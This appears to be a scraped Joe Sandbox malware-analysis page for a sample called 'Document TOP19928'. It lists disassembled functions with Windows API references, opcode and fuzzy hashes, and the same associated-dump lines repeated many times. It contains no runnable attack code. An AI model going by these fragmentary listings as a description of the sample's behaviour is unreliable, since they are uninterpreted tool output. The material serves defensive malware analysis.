Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: Temp$FileNamePath
String ID: aut
API String ID: 3285503233-3010740371
Opcode ID: bb978f6ba5ecc8d773278e2a2f970679e72b57e0bccb2a530942281b8a636e96
Instruction ID: 95904b0fe3d2e70051ed23702be346b16dc0c7f98ec77b7c9bd6207de4c89308
Opcode Fuzzy Hash: bb978f6ba5ecc8d773278e2a2f970679e72b57e0bccb2a530942281b8a636e96
Instruction Fuzzy Hash: F5D05EB954030DABDB10AB90DC0EF9A772CFB04702F0042A1BF64D61A2DEB855988B96

Function 0084CDF1 Relevance: 4.9, APIs: 3, Instructions: 392COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5bbcabcb6ac04f53b43f1511319207fda1e5ddb61b6092860d80dde7813e2ae5
Instruction ID: 2eb4f3cca28b918793e9285db43594524be784c58e92a2af808569f911222e1c
Opcode Fuzzy Hash: 5bbcabcb6ac04f53b43f1511319207fda1e5ddb61b6092860d80dde7813e2ae5
Instruction Fuzzy Hash: D6F14471A083159FCB14DF28C484A6ABBE5FF88314F14892EF8999B352D774E945CF82

Function 007D43DB Relevance: 4.6, APIs: 3, Instructions: 77windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 007D4401
Shell_NotifyIconW.SHELL32(00000000,?), ref: 007D44A6
Shell_NotifyIconW.SHELL32(00000001,?), ref: 007D44C3

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: IconNotifyShell_$_memset
String ID:
API String ID: 1505330794-0
Opcode ID: 5aa3ac58ae2ace2163ff8127df6566f5edba9aed2dab54508a2aba173f3a4f9c
Instruction ID: 110e15d58139481faeae77bc24ff68460cae606e9d9535fba7095a10a1787de5
Opcode Fuzzy Hash: 5aa3ac58ae2ace2163ff8127df6566f5edba9aed2dab54508a2aba173f3a4f9c
Instruction Fuzzy Hash: B2315EB05047418FD720EF64D884A9BBBF8FB48304F04092FE59A83391E779A984CB92

Function 007F594C Relevance: 4.6, APIs: 3, Instructions: 59memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

__FF_MSGBANNER.LIBCMT ref: 007F5963

Part of subcall function 007FA3AB: __NMSG_WRITE.LIBCMT ref: 007FA3D2
Part of subcall function 007FA3AB: __NMSG_WRITE.LIBCMT ref: 007FA3DC

__NMSG_WRITE.LIBCMT ref: 007F596A

Part of subcall function 007FA408: GetModuleFileNameW.KERNEL32(00000000,008943BA,00000104,00000000,00000001,00000000), ref: 007FA49A
Part of subcall function 007FA408: ___crtMessageBoxW.LIBCMT ref: 007FA548

Part of subcall function 007F32DF: ___crtCorExitProcess.LIBCMT ref: 007F32E5
Part of subcall function 007F32DF: ExitProcess.KERNEL32 ref: 007F32EE

Part of subcall function 007F8D68: __getptd_noexit.LIBCMT ref: 007F8D68

RtlAllocateHeap.NTDLL(00EF0000,00000000,00000001), ref: 007F598F

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
String ID:
API String ID: 1372826849-0
Opcode ID: ccdd70eb318482171635ff39c9b9df25f8f6d6f4fc97a185ed84436f15566cd5
Instruction ID: 5c469a8f78835e889a3f6181d833cb86b53274c35bba672727f7370420326670
Opcode Fuzzy Hash: ccdd70eb318482171635ff39c9b9df25f8f6d6f4fc97a185ed84436f15566cd5
Instruction Fuzzy Hash: F901D631300B1DEED629B774D849A3D7348AF41731F50012AF705973C2DABCAD014661

Function 00839B2C Relevance: 4.5, APIs: 3, Instructions: 24filetimeCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,008397D2,?,?,?,?,?,00000004), ref: 00839B45
SetFileTime.KERNELBASE(00000000,?,00000000,?,?,008397D2,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 00839B5B
CloseHandle.KERNEL32(00000000,?,008397D2,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00839B62

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: File$CloseCreateHandleTime
String ID:
API String ID: 3397143404-0
Opcode ID: 01e399b4be83fc63e1e9c35d8bb3c12023f4e40f2840642a511e02da9bef1c38
Instruction ID: cca33d7d0452c5f318c8bff302ac54b1b731ea040efaef85610e9fcbbf6ab50b
Opcode Fuzzy Hash: 01e399b4be83fc63e1e9c35d8bb3c12023f4e40f2840642a511e02da9bef1c38
Instruction Fuzzy Hash: EEE08632181724B7E7222B54EC09FCA7B18FB05772F104120FB54A90E187B525119798

Function 00838F97 Relevance: 4.5, APIs: 3, Instructions: 22COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00838FA5

Part of subcall function 007F2F95: RtlFreeHeap.NTDLL(00000000,00000000,?,007F9C64), ref: 007F2FA9
Part of subcall function 007F2F95: GetLastError.KERNEL32(00000000,?,007F9C64), ref: 007F2FBB

_free.LIBCMT ref: 00838FB6
_free.LIBCMT ref: 00838FC8

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 358057a8cee776a4634d1da6a11f7167cf7af4a4bc472a0de26b354d0d310ced
Instruction ID: d5610e7541e2e298a9f4a678f4704f94ee8f344406ca8e45878b55cc607319a4
Opcode Fuzzy Hash: 358057a8cee776a4634d1da6a11f7167cf7af4a4bc472a0de26b354d0d310ced
Instruction Fuzzy Hash: 08E012A1619705CACA24A578AD44AA367FEAF88350B28081DB509DB243DE28E8428564

Function 007DAB23 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 534COMMON

Download Yara Rule

Strings

CALL, xrefs: 0081002B

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID:
String ID: CALL
API String ID: 0-4196123274
Opcode ID: e4a3082dd8eaf611497f90f6b0f53076c2ff86c4dbe050043274fadd055604db
Instruction ID: a15b43c205b91b91df51e12d53ef345005237243976e20fc0f96abe063b121d4
Opcode Fuzzy Hash: e4a3082dd8eaf611497f90f6b0f53076c2ff86c4dbe050043274fadd055604db
Instruction Fuzzy Hash: 33222770608241DFC724DF14C494A6ABBF1FF84304F15895EE99A8B362D779ED85CB82

Function 007D4DD0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 141COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 007D4E1A

Strings

EA06, xrefs: 0080DCF5

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: _memmove
String ID: EA06
API String ID: 4104443479-3962188686
Opcode ID: 908b18a193518524575a6c77efef45f88738631dccb7f4ee5be5a0ae361cca99
Instruction ID: 56662c819bb81161708e85d6c8b39d98b52510659f6d022fe1cd3de41daaaf45
Opcode Fuzzy Hash: 908b18a193518524575a6c77efef45f88738631dccb7f4ee5be5a0ae361cca99
Instruction Fuzzy Hash: FA415A61A04298BBDF219B64CC957BE7FB6AF45300F684067E882DB386C67D9D4087E1

Function 007D492E Relevance: 3.1, APIs: 2, Instructions: 59COMMON

Download Yara Rule

APIs

745AC8D0.UXTHEME ref: 007D4992

Part of subcall function 007F35AC: __lock.LIBCMT ref: 007F35B2
Part of subcall function 007F35AC: RtlDecodePointer.NTDLL(00000001), ref: 007F35BE
Part of subcall function 007F35AC: RtlEncodePointer.NTDLL(?), ref: 007F35C9

Part of subcall function 007D4A5B: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 007D4A73
Part of subcall function 007D4A5B: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 007D4A88

Part of subcall function 007D3B4C: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 007D3B7A
Part of subcall function 007D3B4C: IsDebuggerPresent.KERNEL32 ref: 007D3B8C
Part of subcall function 007D3B4C: GetFullPathNameW.KERNEL32(00007FFF,?,?,008962F8,008962E0,?,?), ref: 007D3BFD
Part of subcall function 007D3B4C: SetCurrentDirectoryW.KERNEL32(?), ref: 007D3C81

SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 007D49D2

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: InfoParametersSystem$CurrentDirectoryPointer$DebuggerDecodeEncodeFullNamePathPresent__lock
String ID:
API String ID: 2688871447-0
Opcode ID: 4f334f9397b8276f55ba6c0f4e3daf44fe2b953235007fe0d7fc31b439ba8419
Instruction ID: eca2b68689f5b38ed15f50a8863e63950957448c1e4a1087043c2b8c75c97d1c
Opcode Fuzzy Hash: 4f334f9397b8276f55ba6c0f4e3daf44fe2b953235007fe0d7fc31b439ba8419
Instruction Fuzzy Hash: DE11A9719183119FC700EF69EC0990ABBF8FB88710F04851FF141833A2EB74A654CB96

Function 007D5DF9 Relevance: 3.1, APIs: 2, Instructions: 57fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000,?,007D5981,?,?,?,?), ref: 007D5E27
CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,00000000,?,007D5981,?,?,?,?), ref: 0080E19C

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 545c196a0ff0bd05d397bdf23e2ea072350d90d3fd20644ff68da11dcdc87cf4
Instruction ID: 56a8dbff7095666741b69ae483c6465079e382f68b421cfa9c8ad3295720aefa
Opcode Fuzzy Hash: 545c196a0ff0bd05d397bdf23e2ea072350d90d3fd20644ff68da11dcdc87cf4
Instruction Fuzzy Hash: 7101B970244708BFF3251E14CC8AF6637ACFB01769F108319BAE59E2D0C6B81D458B50

Function 007F582D Relevance: 3.0, APIs: 2, Instructions: 42COMMONLIBRARYCODE

Download Yara Rule

APIs

_memset.LIBCMT ref: 007F585C
__lock_file.LIBCMT ref: 007F587D

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: __lock_file_memset
String ID:
API String ID: 26237723-0
Opcode ID: 5e05f467d7ab91d12ce5e56b9fbd13f383d9aefe20d169e7d0832fd242a4802a
Instruction ID: e07497cdf199fd391dfea6dafd0418476ea04f3c35a938434b21cfeaa1e463b2
Opcode Fuzzy Hash: 5e05f467d7ab91d12ce5e56b9fbd13f383d9aefe20d169e7d0832fd242a4802a
Instruction Fuzzy Hash: 1D018471800A0CEBCF12AF69DC099BE7B61BF803A0F144215BB245B3A1DB398A51DB91

Function 007F55D6 Relevance: 3.0, APIs: 2, Instructions: 33COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 007F8D68: __getptd_noexit.LIBCMT ref: 007F8D68

__lock_file.LIBCMT ref: 007F561B

Part of subcall function 007F6E4E: __lock.LIBCMT ref: 007F6E71

__fclose_nolock.LIBCMT ref: 007F5626

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: __fclose_nolock__getptd_noexit__lock__lock_file
String ID:
API String ID: 2800547568-0
Opcode ID: b81e6d42c1ab737c8e60bc66c9a0cfc0e07ae74b25fa537ad8aa56e3bb59666f
Instruction ID: c78ebf75913bd069448506335cb9222a584878aec83389e299278aa49f5df018
Opcode Fuzzy Hash: b81e6d42c1ab737c8e60bc66c9a0cfc0e07ae74b25fa537ad8aa56e3bb59666f
Instruction Fuzzy Hash: 0DF09071904A0CDADB60AF75C80A77E66A16F40B34F558209A734EB3C1CF7C89019B56

Function 007D81C1 Relevance: 2.6, APIs: 2, Instructions: 54COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,00000001,00000000,00000000,?,?,?,007D558F,?,?,?,?,?), ref: 007D81DA
MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,00000001,00000000,?,?,?,007D558F,?,?,?,?,?), ref: 007D820D

Part of subcall function 007D78AD: _memmove.LIBCMT ref: 007D78E9

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: ByteCharMultiWide$_memmove
String ID:
API String ID: 3033907384-0
Opcode ID: 415ebeb5394910e608a14e3089d814088b66f86f04295f053fbfc3db7dc177fb
Instruction ID: 9c506328f674eae954a5df127c4311a683c99ced7c7468a57a5ec0ec5b513b72
Opcode Fuzzy Hash: 415ebeb5394910e608a14e3089d814088b66f86f04295f053fbfc3db7dc177fb
Instruction Fuzzy Hash: 7E01AD31241604BFEB256A25DD4AF7B3B6CEB89760F10802AFE05CD291EE24A800D671

Function 007E2123 Relevance: 1.7, APIs: 1, Instructions: 171COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8e8a328f9837596f5951728b94bb95bc1378be8fdacdd5d41a439d8e7b1bec56
Instruction ID: a6061bd926e6f0f58ddb258d394708ae0e77a915f8f65e31d475a968a239ed39
Opcode Fuzzy Hash: 8e8a328f9837596f5951728b94bb95bc1378be8fdacdd5d41a439d8e7b1bec56
Instruction Fuzzy Hash: EB518F34600614EFCF14EB68C995EAD77B9AF88310F148169F946AB382DA38ED018751

Function 00EE1070 Relevance: 1.7, APIs: 1, Instructions: 157COMMON

Download Yara Rule

APIs

Part of subcall function 00EE08E0: GetFileAttributesW.KERNELBASE(?), ref: 00EE08EB

CreateDirectoryW.KERNELBASE(?,00000000), ref: 00EE119F

Memory Dump Source

Source File: 00000000.00000002.2013615732.0000000000EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ee0000_Document TOP19928.jbxd

Similarity

API ID: AttributesCreateDirectoryFile
String ID:
API String ID: 3401506121-0
Opcode ID: 6167f84fd8789eecc1f2067891100837ad7d7966fc0f9d36921b13fb01911f6a
Instruction ID: 0b9b3125c5df8dc41fb79289394bbe3c8a3bba50b7aace07de20ce6522753ac2
Opcode Fuzzy Hash: 6167f84fd8789eecc1f2067891100837ad7d7966fc0f9d36921b13fb01911f6a
Instruction Fuzzy Hash: 1751B631A1024D97DF14EFA0C945BEF7379EF58300F0055A9A609F7290EB799B44CBA5

Function 007D766F Relevance: 1.6, APIs: 1, Instructions: 103COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 007D774A

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: ab6fd76627a5ae7c550f538024095d9708897891a7e1bc3d2fbdd679136dc1ef
Instruction ID: 232dec467aad22a427a2db7045535cd899f92dfe323ab39fc1e4da6930516942
Opcode Fuzzy Hash: ab6fd76627a5ae7c550f538024095d9708897891a7e1bc3d2fbdd679136dc1ef
Instruction Fuzzy Hash: 23319479608A02DFC7289F18C494921F7F4FF08320B54C56AE99A8B7A5FB34D891CB94

Function 007D5C4E Relevance: 1.6, APIs: 1, Instructions: 97COMMON

Download Yara Rule

APIs

SetFilePointerEx.KERNELBASE(?,?,00000001,00000000,00000000,?,?,00000000), ref: 007D5CF6

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: 0004df48a320e4f2157235f82f14c62b4323338a81cc991082949e4777d617da
Instruction ID: 1d3dd53e92f3f6fdac5054aceaf2c6302b4049c1edf747f4691c4185908fff6e
Opcode Fuzzy Hash: 0004df48a320e4f2157235f82f14c62b4323338a81cc991082949e4777d617da
